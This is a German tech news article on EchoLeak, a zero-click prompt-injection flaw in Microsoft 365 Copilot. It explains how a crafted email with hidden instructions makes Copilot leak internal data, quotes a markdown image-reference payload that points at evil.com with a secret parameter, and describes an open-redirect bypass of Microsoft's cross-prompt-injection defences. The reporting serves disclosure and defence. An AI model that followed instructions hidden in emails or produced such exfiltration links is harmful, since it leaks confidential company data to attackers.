Tada Images – shutterstock.com
Stellen Sie sich einen Angriff vor, der so heimlich ist, dass er keine Klicks, keine Downloads und keine Warnungen erfordert – es reicht eine einzelne E-Mail, die in Ihrem Posteingang landet. Das ist der Fall bei EchoLeak, einer kritischen Sicherheitslücke in Microsoft 365 Copilot. Sie ermöglicht es Hackern, sensible Unternehmensdaten zu stehlen, ohne dass die Opfer auch nur einen Finger rühren.
Die von Aim Security entdeckte Schwachstelle ist der erste dokumentierte Zero-Click-Angriff auf einen KI-Agenten. „Eine einzige manipulierte E-Mail reicht aus. Copilot verarbeitet sie unbemerkt, folgt versteckten Anweisungen, durchsucht interne Dateien und versendet vertrauliche Daten, während es die Sicherheitsvorkehrungen von Microsoft umgeht“, erklären die Sicherheitsspezialisten in ihrem Blogbeitrag.
„Damit wird die Kernstärke der KI, ihr Kontextverständnis, gegen sich selbst instrumentalisiert“, ergänzt Abhishek Anant Garg, Analyst bei der QKS Group. „Die Unternehmenssicherheit hat Schwierigkeiten, weil sie für bösartigen Code ausgelegt ist und nicht für eine Sprache, die harmlos aussieht, sich aber wie eine Waffe verhält.“
Nader Henein, VP Analyst bei Gartner warnt: „Diese Art von Schwachstelle stellt eine erhebliche Bedrohung dar. Angesichts der Komplexität von KI-Assistenten und RAG-basierten Diensten wird dies sicherlich nicht der letzte Fall sein, den wir sehen werden.“
Der Exploit-Mechanismus von EchoLeak
EchoLeak nutzt die Fähigkeit von Copilot, sowohl vertrauenswürdige interne Daten (wie E-Mails, Teams-Chats und OneDrive-Dateien) als auch nicht vertrauenswürdige externe Eingaben, wie eingehende E-Mails, zu verarbeiten. Der Angriff beginnt mit einer bösartigen E-Mail, die eine bestimmte Markdown-Syntax enthält, „wie ![Bild-Alt-Text][ref] [ref]: https://www.evil.com?param=<secret>“.
Während Copilot die E-Mail automatisch im Hintergrund scannt, um sich auf Benutzeranfragen vorzubereiten, löst der KI-Assistent eine Browseranfrage aus, die sensible Daten wie Chat-Verläufe, Benutzerdaten oder interne Dokumente an den Server eines Angreifers sendet.
Die Exploit-Kette basiert auf mehreren Schwachstellen, darunter eine offene Weiterleitung in der Content Security Policy (CSP) von Microsoft, die Domänen von Teams und SharePoint vertraut. Dadurch können Angreifer bösartige Anfragen als legitim tarnen und die Abwehrmaßnahmen von Microsoft gegen Cross-Prompt-Injection-Angriffe (XPIA) umgehen.
„EchoLeak deckt die falsche Sicherheit von schrittweisen KI-Einführungen auf“, so das Fazit der Spezialisten von der QKS Group. Aim Security stuft diese Schwachstelle als „LLM Scope Violation“ ein, bei der nicht vertrauenswürdige Eingabeaufforderungen die KI dazu manipulieren, auf Daten außerhalb ihres vorgesehenen Bereichs zuzugreifen.
„Angreifer können auf Inhalte aus anderen Teilen des LLM-Kontexts verweisen, um sensible Informationen zu extrahieren und so die Synthesefähigkeit der KI in einen Vektor für die Datenexfiltration zu verwandeln“, fügt Garg hinzu.
Die Forscher fanden darüber hinaus ähnliche Schwachstellen, was darauf hindeutet, dass andere KI-Systeme, die dieselbe Technologie verwenden, ebenfalls gefährdet sein könnten. Microsoft gab an, die Sicherheitslücke behoben zu haben, und beteuerte, dass keine Kunden betroffen waren und es keine tatsächlichen Angriffe gegeben habe.
Echos über Microsoft hinaus
„EchoLeak markiert einen Wandel hin zu Architekturen, die von einer Kompromittierung ausgehen“, betont der QKS Group-Experte. „Unternehmen müssen nun damit rechnen, dass feindliche Prompt-Injektionen auftreten werden, sodass eine Echtzeit-Verhaltensüberwachung und agentenbezogene Bedrohungsmodellierung zu existenziellen Anforderungen werden.“
Da KI aus dem Arbeitsalltag nicht mehr wegzudenken ist, fordern Analysten eine robuste Eingabevalidierung und Datenisolierung. Gartner-Analyst Henein warnte, dass gezielte Angriffe wie „das Versenden einer E-Mail an einen CFO, um Verdienstangaben vor der Veröffentlichung zu stehlen“ besonders besorgniserregend sind.
Jedes KI-System, das auf Retrieval-Augmented Generation (RAG) basiert, könnte gefährdet sein, wenn es externe Eingaben zusammen mit sensiblen internen Daten verarbeitet. Laut Garg könnten herkömmliche Abwehrmaßnahmen wie DLP-Tags solche Angriffe oft nicht verhindern. “Zudem beeinträchtigen sie möglicherweise die Funktionalität von Copilot, wenn sie aktiviert sind“, fügt er hinzu.
„Die Schwachstelle beweist, dass herkömmliche Perimeter bedeutungslos sind, wenn KI manipuliert werden kann, um durch scheinbar harmlose Eingaben Grenzen zu überschreiten“, mahnt der QKS-Group-Analyst.
Für Branchen wie das Bankwesen, die Gesundheitsbranche und die Verteidigung können diese Produktivitätswerkzeuge gleichzeitig als leistungsstarke Exfiltrationsmechanismen dienen. „CIOs müssen KI-Systeme jetzt unter der Annahme einer feindlichen Autonomie entwickeln“, fordert Garg. „Jeder Agent ist eine potenzielle Datenleckquelle und muss vor der Produktion einer Red-Team-Validierung unterzogen werden.“
KI-Sicherheit neu denken
EchoLeak zeigt, dass KI für Unternehmen nicht immun gegen Kompromittierung ist und dass es bei ihrer Sicherung nicht nur darum geht, Lücken zu stopfen. „KI-Agenten erfordern ein neues Schutzparadigma“, betont der QKS-Group-Experte. „Laufzeitsicherheit muss der Mindeststandard sein.“
Die Schwachstelle offenbart auch tiefergehende strukturelle Probleme in der modernen KI. „Agentic KI leidet unter einem Kontextkollaps“, führt Garg aus. „Sie vermischt Daten aus verschiedenen Sicherheitsdomänen und kann nicht unterscheiden, worauf sie zugreifen kann und worauf sie zugreifen sollte, wodurch diese Synthese zu einer Privilegienausweitung führt.“
Angesichts der wachsenden Angriffsfläche von KI beweist EchoLeak, dass selbst die ausgefeiltesten Systeme durch Ausnutzung der KI-eigenen Logik als Waffe eingesetzt werden können. „Vorerst“, so Garg abschließend, „sollten CISOs ganz genau hinschauen und besser zweimal überlegen, bevor sie der KI Zugriff auf ihren Posteingang gewähren.“ (jm)
Lesetipp: GenAI-Security als Checkliste